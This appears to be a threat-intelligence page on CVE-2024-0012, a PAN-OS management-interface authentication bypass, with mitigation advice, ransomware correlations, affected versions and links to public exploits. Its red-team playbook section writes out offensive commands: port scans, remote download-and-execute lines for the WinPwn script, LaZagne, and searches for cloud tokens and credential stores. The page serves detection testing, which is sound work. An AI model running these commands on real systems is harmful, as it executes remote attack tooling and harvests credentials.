CVE-2024-0012
Overview
This vulnerability is an authentication bypass in the management web interface of Palo Alto Networks PAN-OS software. The root cause lies in improper validation of authentication headers, specifically the X-PAN-AUTHCHECK header, allowing unauthenticated requests to bypass normal authentication mechanisms. The flaw affects the PAN-OS management web interface component in versions 10.2, 11.0, 11.1, and 11.2.
Vulnerability Description
An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474 https://security.paloaltonetworks.com/CVE-2024-9474 . The risk of this issue is greatly reduced if you secure access to the management web interface by restricting access to only trusted internal IP addresses according to our recommended best practice deployment guidelines https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431 . This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, PAN-OS 11.1, and PAN-OS 11.2 software. Cloud NGFW and Prisma Access are not impacted by this vulnerability.
Impact
An unauthenticated attacker with network access to the management web interface can gain full administrator privileges. This enables them to perform administrative actions, modify firewall configurations, and exploit additional authenticated vulnerabilities, potentially leading to full system compromise and lateral movement within connected networks. No user interaction or prior credentials are required, making this a critical risk for exposed management interfaces.
Solution
Palo Alto Networks advises upgrading affected PAN-OS versions to fixed releases as detailed in their security advisory at https://security.paloaltonetworks.com/CVE-2024-0012. Additionally, restricting access to the management web interface to trusted internal IP addresses per vendor best practice deployment guidelines is recommended as a mitigating control. Refer to the official advisory for precise patch versions and deployment instructions.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Correlated Groups
Correlations are established through analysis of shared tools, tactics, and infrastructure between threat groups and vulnerabilities. They do not represent direct confirmation of exploitation.
| Group | Confidence | Victims | Source |
|---|---|---|---|
|
akira
|
LOW | 1529 | Chain Inference |
|
ransomhub
|
LOW | 842 | Chain Inference |
|
sinobi
|
LOW | 274 | Chain Inference |
|
frag
|
LOW | 30 | Chain Inference |
|
0apt
|
LOW | — | Chain Inference |
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in Palo Alto Networks PAN-OS software represents a critical authentication bypass flaw that allows unauthenticated attackers with network access to the management web interface to gain administrative privileges. This weakness arises from improper validation mechanisms within the software, which fail to enforce adequate authentication checks. As a result, attackers can perform administrative actions, manipulate configurations, and potentially exploit other vulnerabilities that require higher privileges, such as those related to privilege escalation. The affected versions include PAN-OS 10.2, 11.0, 11.1, and 11.2, highlighting a significant risk for organizations utilizing these specific software versions.
Exploitation of this vulnerability can occur through various attack vectors. An attacker with network access could initiate a session with the management interface, bypassing authentication checks and gaining unauthorized access. This scenario could be executed remotely, making it particularly concerning for organizations with exposed management interfaces. For instance, an attacker could alter firewall rules, disable security features, or exfiltrate sensitive data, leading to severe operational disruptions. Moreover, the potential for chaining this vulnerability with other authenticated privilege escalation vulnerabilities amplifies the risk, as it could allow attackers to escalate their privileges further and gain deeper access to the network.
The real-world impact of this vulnerability is profound, posing significant business risks. Organizations relying on PAN-OS for network security may find themselves vulnerable to data breaches, operational downtime, and reputational damage. The ability for attackers to manipulate configurations could lead to unauthorized access to sensitive systems, resulting in data loss or theft. Additionally, the financial implications of remediation efforts, regulatory fines, and loss of customer trust can be substantial. Given the critical nature of firewalls and network security appliances, the exploitation of such vulnerabilities can have cascading effects on an organization's overall security posture.
To mitigate the risks associated with this vulnerability, organizations should implement robust detection and prevention strategies. First and foremost, securing access to the management web interface is crucial. This can be achieved by restricting access to trusted internal IP addresses, following best practice deployment guidelines provided by Palo Alto Networks. Furthermore, organizations should employ network segmentation to limit exposure and implement intrusion detection systems (IDS) to monitor for suspicious activities targeting the management interface. Regular security audits and vulnerability assessments should also be conducted to identify and remediate potential weaknesses in the network infrastructure.
In conclusion, the authentication bypass vulnerability in PAN-OS software poses a significant threat to organizations using affected versions of the software. The potential for unauthorized administrative access can lead to severe operational and financial repercussions. By understanding the technical details, attack vectors, and real-world implications, organizations can better prepare themselves to detect and mitigate these risks effectively. Implementing stringent access controls and continuous monitoring will be essential in safeguarding against exploitation and maintaining a secure network environment.
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting the PAN-OS authentication bypass vulnerability, accompanied by the emergence of an additional ransomware group leveraging this flaw. This expansion in adversary interest, particularly among ransomware operators, underscores the growing operationalization of CVE-2024-0012 within threat actor toolsets. Although the overall exploitation trend remains relatively stable without a rapid surge, the broadened ransomware associations signal a diversification in threat actor profiles exploiting this vulnerability. The availability of multiple new proof-of-concept exploits further lowers the barrier for attackers, potentially accelerating exploitation in less secure environments. Consequently, this evolution elevates the threat landscape’s complexity and persistence, warranting heightened vigilance. While the EPSS score remains high, the slight uptick in activity and expanded ransomware involvement collectively reinforce the criticality of this vulnerability, maintaining its position as a severe risk to organizations relying on vulnerable PAN-OS deployments.
Update 2 — July 09, 2026
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2024-0012, accompanied by the continued proliferation of publicly available proof-of-concept exploits. This subtle rise in activity, combined with the stable but near-maximum EPSS score, underscores persistent attacker interest and operational momentum. Notably, ransomware groups linked to this vulnerability have maintained their campaign efforts, reinforcing the risk of this authentication bypass being leveraged for broader intrusion and ransomware deployment. The expanding toolkit ecosystem lowers the technical barrier for adversaries, potentially accelerating exploitation in underprotected environments. Consequently, the threat level remains critical, with the evolving exploitation landscape demanding sustained vigilance from defenders to monitor and respond to emerging activity patterns.
Affected Products (117)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Paloaltonetworks | Pan-Os | 10.2.0 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.0:-:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.0 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.0:h1:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.0 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.0:h2:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.0 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.0:h3:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.1 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.1:-:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.1 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.1:h1:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.1 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.1:h2:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.2 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.2:-:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.2 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.2:h1:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.2 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.2:h2:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.2 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.2:h4:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.2 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.2:h5:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.3 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.3:-:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.3 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.3:h11:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.3 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.3:h12:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.3 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.3:h13:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.3 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.3:h2:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.3 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.3:h4:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.3 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.3:h9:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.4 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.4:-:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Palo Alto Networks PAN-OS Management Interface Unauthenticated Remote Code Execution
exploits/linux/http/panos_management_unauth_rce
|
watchTowr, sfewer-r7 | Unknown | linux, unix | View |
GitHub PoCs (10)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
watchtowrlabs/palo-alto-panos-cve-2024-0012
|
watchtowrlabs | 24 | 6 | 2024-11-19 | View |
|
Sachinart/CVE-2024-0012-POC
CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015) RCE POC
|
Sachinart | 20 | 9 | 2024-11-19 | View |
|
TalatumLabs/CVE-2024-0012_CVE-2024-9474_PoC
This PoC is targeting vulnerabilities in Palo Alto PAN-OS, specifically CVE-2024-0012 and CVE-2024-9474. This script au...
|
TalatumLabs | 8 | 5 | 2024-12-11 | View |
|
Regent8SH/PanOsExploitMultitool
Exploitation and Post-Exploitation Multitool for Palo Alto PAN-OS Systems affected by vulnerabilities CVE-2024-0012 and ...
|
Regent8SH | 6 | 1 | 2025-05-21 | View |
|
dcollaoa/cve-2024-0012-gui-poc
Python script for CVE-2024-0012 / CVE-2024-9474 exploit
|
dcollaoa | 4 | 3 | 2025-02-06 | View |
|
0xjessie21/CVE-2024-0012
CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015) RCE POC
|
0xjessie21 | 3 | 1 | 2024-11-30 | View |
|
iSee857/CVE-2024-0012-poc
CVE-2024-0012批量检测脚本
|
iSee857 | 2 | 0 | 2024-11-22 | View |
|
greaselovely/CVE-2024-0012
PANW NGFW CVE-2024-0012
|
greaselovely | 1 | 0 | 2024-11-20 | View |
|
punitdarji/Paloalto-CVE-2024-0012
|
punitdarji | 0 | 1 | 2024-11-22 | View |
|
Gr-1m/cve-2024-0012-poc
CVE-2024-0012是Palo Alto Networks PAN-OS软件中的一个身份验证绕过漏洞。该漏洞允许未经身份验证的攻击者通过网络访问管理Web界面,获取PAN-OS管理员权限,从而执行管理操作、篡改配置,或利用其他需要身份...
|
Gr-1m | 0 | 0 | 2024-11-22 | View |
Ransomware Groups 5
Threat Feed
43 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability (30 known victims)
Ransomware group known to exploit this vulnerability (30 known victims)
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability (274 known victims)
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability (274 known victims)
Ransomware group known to exploit this vulnerability
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-0012 |
| security.paloaltonetworks.com |
GitHub CVE
vendor-advisory
|
https://security.paloaltonetworks.com/CVE-2024-0012 |
| unit42.paloaltonetworks.com |
NVD API
Vendor Advisory
|
https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/ |
| labs.watchtowr.com |
NVD API
Exploit
Third Party Advisory
|
https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/ |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-0012 |